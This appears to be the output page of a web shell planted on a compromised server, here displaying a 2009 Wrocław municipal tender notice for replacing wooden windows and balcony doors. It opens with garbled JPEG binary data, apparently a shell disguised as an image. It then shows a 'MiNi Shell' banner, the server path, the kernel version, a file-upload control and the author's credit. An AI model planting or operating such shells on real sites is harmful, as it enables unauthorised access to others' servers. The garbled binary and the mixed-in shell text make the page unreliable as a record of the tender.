JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/75257-N-2009.html

<p class="kh_header"><b>Wrocław: WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ NA DREWNIANĄ W LOKALACH GMINY WROCŁAW</b><br>
<b>Numer ogłoszenia: 75257 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Zasobu Komunalnego , ul. Św. Elżbiety 3, 50-111 Wrocław, woj. dolnośląskie, tel. 071 7778400, faks 071 7777506.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzk.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA STOLARKI OKIENNEJ I DRZWIOWEJ NA DREWNIANĄ W LOKALACH GMINY WROCŁAW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje: demontaż starej istniejącej stolarki okiennej i drzwiowej (drzwi balkonowe) wraz z parapetami, dostawę i montaż nowej stolarki drewnianej (drewno klejone trójwarstwowo, okna rozwierane z górnym systemem wentylacji) i parapetów wraz z niezbędnym wykończeniem otworów, wykonaniu niezbędnych robót porządkowych w lokalu, budynku i na terenie przyległym oraz wywiezienie gruzu budowlanego, starej stolarki okiennej, parapetów i innych odpadów powstałych podczas prac demontażowych i montażowych wraz z ich przekazaniem na składowisko odpadów. Wygląd zewnętrzny nowych okien i drzwi balkonowych winien zachować ich pierwotny charakter i podział, a także wystrój.
3.	Ze względu na ilość i znaczne zróżnicowanie okien Zamawiający nie przewiduje przedstawienia rysunków, obmiar wykonawczy stolarki okiennej wybrany Wykonawca sporządzał będzie w trybie roboczym, bezpośrednio przed jej wymianą w każdym lokalu.
4.	Miejscem wykonania robót są lokale mieszkalne lub użytkowe stanowiące własność Gminy Wrocław, znajdujące się w budynkach położonych na terenie Wrocławia 
w rejonach wskazanych w pkt 5 niniejszego rozdziału. Wykaz adresowy dla każdego zadania Wykonawca otrzyma, w terminie 7 dni po podpisaniu umowy, od właściwego BOK-u..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 5.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości: 

ZADANIE nr I - 5 000 zł (słownie: pięć tysięcy złotych),
ZADANIE nr II -  5 000 zł (słownie: pięć tysięcy złotych),
ZADANIE nr III -5 000 zł (słownie: pięć tysięcy złotych),
ZADANIE nr IV -  4 000 zł (słownie: cztery tysiące złotych),
ZADANIE nr V - 4 000 zł (słownie: cztery tysiące złotych),
ZADANIE nr VI - 4 000 zł (słownie: cztery tysiące złotych),
ZADANIE nr VII - 4 000 zł (słownie: cztery tysiące złotych),
ZADANIE nr VIII - 8 000 zł (słownie: osiem tysięcy złotych),
ZADANIE nr IX - 4 000 zł (słownie: cztery tysiące złotych),
ZADANIE nr X - 5 000 zł (słownie: pięć tysięcy złotych).

2. 	W zależności od woli Wykonawcy wadium może być wniesione w:
a.	pieniądzu,
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c.	gwarancjach bankowych,
d.	gwarancjach ubezpieczeniowych,
e.	poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 ze zmianami).
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy  Zamawiającego: BZ WBK S.A I O. Wrocław nr 13 1090 2398 0000 0006 0829 2362, tak aby kwota wadium znalazła się na koncie Zamawiającego nie później niż w dniu i godzinie przewidzianej na składanie ofert - podając na dowodzie wpłaty numer postępowania i/lub nazwę postępowania. 
4.	Oryginał dowodu wniesienia wadium w pieniądzu lub jego kopię, opatrzoną klauzulą -za zgodność z oryginałem- i poświadczoną za zgodność z oryginałem przez Wykonawcę -podpisem czytelnym lub nieczytelnym wraz z pieczątką imienną-, należy dołączyć do oferty.
5.	Wadium wnoszone w innej formie niż pieniądz musi mieć postać oświadczenia Gwaranta, w którym Gwarant zobowiązuje się nieodwołalnie i bezwarunkowo, na pierwsze żądanie zapłacić Zamawiającemu kwotę stanowiącą równowartość wadium w przypadkach określonych ustawą tj. gdy:
a)	Wykonawca odmówi podpisania umowy w sprawie zamówienia publicznego
na warunkach zawartych w ofercie,
b)	Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy,
d)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 26 ust. 1 lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po  jego stronie<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy Pzp oraz spełniający poniższe warunki: 

1.	Potencjał kadrowy
Wykonawca musi wykazać, że dysponuje/będzie dysponował osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej, a także należy do Okręgowej Izby Inżynierów Budownictwa; osoba ta pełnić będzie funkcję kierownika budowy.
2.	Doświadczenie
Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał należycie, co najmniej jedną robotę budowlaną polegającą na wymianie stolarki budowlanej drewnianej, o łącznym metrażu wymienionej stolarki nie mniejszym niż 150 m2 w ramach jednej umowy, w budynkach mieszkalnych lub użytkowych.
3.	 Wymagania dotyczące przedmiotu zamówienia:
Oferowane drewniane okna muszą spełniać warunki określone w art. 8 i art.9 ustawy z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881) tj. posiadać wymagane aprobaty techniczne, certyfikaty lub deklaracje zgodności 
z normą PN-EN 14351-:2006.

	Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:
Na potwierdzenie spełnienia wyżej wymienionych warunków - Wykonawca dołączy 
do oferty oświadczenia i dokumenty wymienione w rozdziale IV SIWZ. 
Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana 
wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. 	Status prawny - wymagane dokumenty:
1/ oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy Pzp - wzór załącznika nr 2 do SIWZ.
2/ aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3/ 	jeśli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentu określonego w pkt. A.2 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, ze nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

B. 	Zdolność techniczna - wymagane dokumenty:
4/	 informację o osobie, którą dysponuje/będzie dysponował Wykonawca i która będzie uczestniczyć w wykonywaniu zamówienia, posiadającej uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej, a także należy do Okręgowej Izby Inżynierów Budownictwa (wzór załącznika nr 3 do SIWZ). Należy załączyć posiadane uprawnienia budowlane wskazanej osoby wraz z dokumentami potwierdzającymi przynależność do Okręgowej Izby Inżynierów Budownictwa, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118) i ustawy 
z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5 poz. 42 z późn. zm.).

W przypadku, gdy Wykonawca poda informację o osobie, którą będzie dysponował musi dołączyć do oferty  pisemne zobowiązanie (oświadczenie) tej osoby lub innych podmiotów do udostępnienia osoby która będzie uczestniczyć w wykonywaniu zamówienia.

5/	wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zawierający co najmniej jedną robotę budowlaną polegającą na wymianie stolarki budowlanej drewnianej, o łącznym metrażu wymienionej stolarki nie mniejszym niż 150 m2 w ramach jednej umowy, w budynkach mieszkalnych lub użytkowych, z podaniem zakresu prac każdego zrealizowanego zamówienia, ilości m2 wymienionej stolarki, daty i miejsca wykonania, nazwy i adresu zleceniodawcy (załącznik nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających, że robota ta została wykonana należycie. 
C. Przedmiot zamówienia - wymagane dokumenty 
6/  Na potwierdzenie spełnienia wymagań art.8 i art.9 ustawy z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92 poz. 881) należy przedstawić: 
a.	(pełną) kompletną aprobatę techniczną na oferowany system stolarki,
b.	 certyfikat zgodności lub krajową deklarację zgodności z aprobatą techniczną na system stolarki z wstępnymi wynikami badań,
c.	z certyfikat na szybę uprawniający do oznakowania wyrobu na znak bezpieczeństwa B, 
d.	świadectwo badań Instytutu Szkła i Ceramiki na szyby zespolone, 
e.	atest higieniczny Państwowego Zakładu Higieny na okna zgodnie z parametrami zawartymi w opisie przedmiotu zamówienia,
lub
f.	dokumentów potwierdzających zgodność z normą PN-EN 14351-:2006..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zzk.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można pobrać bezpłatnie ze strony: www.zzk.wroc.pl lub w cenie  5 zł uzyskać za zaliczeniem pocztowym, a także w Dziale Zamówień - ul. Grabiszyńska 257, pok.104 po uprzednim złożeniu wniosku..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2009 godzina 10:00, miejsce: Oferty można składać  w Dziale Zamówień ZZK, ul. Grabiszyńska 257 p. 105 I p. lub w Kancelarii przy ul. Św. Elżbiety 3,  a także można przesłać pocztą na adres: ZZK ul. św. Elżbiety 3, 50-111 Wrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon A, B..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr I		- 	Rejon A, B 
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 279 m2 w tym:
- okna prostokątne: 250 m2, 
- okna łukowe 29,00 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon D, E..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr II		- 	Rejon D, E 
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 271 m2 w tym: 
- okna prostokątne: 242 m2, 
- okna łukowe 29,00 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon F, G..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr III		- 	Rejon F, G 
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 247 m2 w tym: 
- okna prostokątne: 225 m2, 
- okna łukowe 22  m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.21.30-0, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon H, I..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr IV		- 	Rejon H, I 
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 221 m2 w tym: 
- okna prostokątne: 200 m2, 
- okna łukowe 21 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon J, K..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr V		- 	Rejon J, K 
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 218 m2 w tym:
- okna prostokątne: 197  m2, 
- okna łukowe 21 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon M, N..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr VI		- 	Rejon M, N 
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 197 m2 w tym:
- okna prostokątne: 180  m2, 
- okna łukowe 17  m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon O, P, T..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr VII		- 	Rejon O, P, T
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 198 m2 w tym: 
- okna prostokątne: 178  m2, 
- okna łukowe 20 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon R..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr VIII		- 	Rejon R
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 383 m2 w tym: 
- okna prostokątne: 332  m2, 
- okna łukowe 51 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon S, U..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr IX		- 	Rejon S, U
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 221 m2 w tym: 
- okna prostokątne: 204 m2, 
- okna łukowe 17 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Wymiana stolarki okiennej i drzwiowej na drewnianą 
w lokalach Gminy Wrocław - rejon  Ł..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE nr X		- 	Rejon Ł
Maksymalna, szacunkowa ilość stolarki okiennej do wymiany: 262 m2 w tym:
- okna prostokątne: 234 m2, 
- okna łukowe 28 m2..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.30-4, 45.42.21.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com